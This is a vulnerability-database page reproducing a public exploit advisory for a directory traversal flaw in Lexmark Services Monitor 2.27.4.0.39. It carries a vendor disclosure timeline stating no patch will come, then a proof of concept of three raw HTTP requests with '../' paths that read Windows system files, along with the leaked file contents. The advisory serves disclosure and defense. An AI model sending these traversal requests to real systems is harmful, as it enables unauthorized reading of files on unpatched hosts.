Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Lexmark Services Monitor 2.27.4.0.39 Directory Traversal

🗓️ 18 Nov 2019 00:00:00Reported by Kevin RandallType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 143 Views

Lexmark Services Monitor 2.27.4.0.39 Directory Traversal vulnerability on TCP Port 2070

Code
`# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal  
# Google Dork: N/A​  
# Date: 2019​-11-15  
# Exploit Author: Kevin Randall​  
# Vendor Homepage: https://www.lexmark.com/en_us.html​  
# Software Link: https://www.lexmark.com/en_us.html​  
# Version: 2.27.4.0.39 (Latest Version)​  
# Tested on: Windows Server 2012​  
# CVE : N/A  
​  
​  
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​  
​  
Timeline:​  
Discovered on: 9/24/2019​  
Vendor Notified: 9/24/2019​  
Vendor Confirmed Receipt of Vulnerability: 9/24/2019​  
Follow up with Vendor: 9/25/2019​  
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​  
Vendor Confirmed Vulnerability is Valid: 9/26/2019​  
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​  
Vendor Confirmed Signoff to Disclose: 9/27/2019​  
Final Email Sent: 9/27/2019​  
Public Disclosure: 11/15/2019​  
​  
PoC:​  
​  
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​  
TE: deflate,gzip;q=0.3​  
Connection: TE, close​  
Host: 10.200.15.70:2070​  
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​  
​  
HTTP/1.0 200 OK​  
Server: rXpress​  
Content-Length: 848536​  
​  
​  
.​  
.​  
.​  
.[.P.e.r.f.l.i.b.].​  
.​  
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​  
.​  
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​  
.​  
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​  
.​  
.​  
.​  
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​  
.​  
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​  
.​  
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​  
.​  
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​  
.​  
.L.a.s.t. .H.e.l.p.=.5.0.4.1.​  
.​  
.​  
.​  
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​  
.​  
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​  
​  
​  
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​  
TE: deflate,gzip;q=0.3​  
Connection: TE, close​  
Host: 10.200.15.70:2070​  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​  
​  
HTTP/1.0 200 OK​  
Server: rXpress​  
Content-Length: 38710​  
​  
..[.S.t.r.i.n.g.s.].​  
.​  
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​  
.​  
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​  
.​  
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​  
.​  
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​  
.​  
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​  
.​  
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​  
.​  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​  
.​  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​  
.​  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​  
.​  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​  
.​  
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​  
​  
​  
​  
​  
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​  
TE: deflate,gzip;q=0.3​  
Connection: TE, close​  
Host: 10.200.15.70:2070​  
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​  
​  
HTTP/1.0 200 OK​  
Server: rXpress​  
Content-Length: 17463​  
​  
# Copyright (c) 1993-2004 Microsoft Corp.​  
#​  
# This file contains port numbers for well-known services defined by IANA​  
#​  
# Format:​  
#​  
# <service name> <port number>/<protocol> [aliases...] [#<comment>]​  
#​  
​  
echo 7/tcp​  
echo 7/udp​  
discard 9/tcp sink null​  
discard 9/udp sink null​  
systat 11/tcp users #Active users​  
systat 11/udp users #Active users​  
daytime 13/tcp​  
daytime 13/udp​  
qotd 17/tcp quote #Quote of the day​  
qotd 17/udp quote #Quote of the day​  
chargen 19/tcp ttytst source #Character generator​  
chargen 19/udp ttytst source #Character generator​  
ftp-data 20/tcp #FTP, data​  
ftp 21/tcp #FTP. control​  
ssh 22/tcp #SSH Remote Login Protocol​  
telnet 23/tcp​  
smtp 25/tcp mail #Simple Mail Transfer Protocol​  
time 37/tcp timserver  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Nov 2019 00:00Current
7.4High risk
Vulners AI Score7.4
lexmarkservices monitordirectory traversaltcp port 2070vendorwindows server 2012vulnerabilityexploittimelinedisclosurepoc
143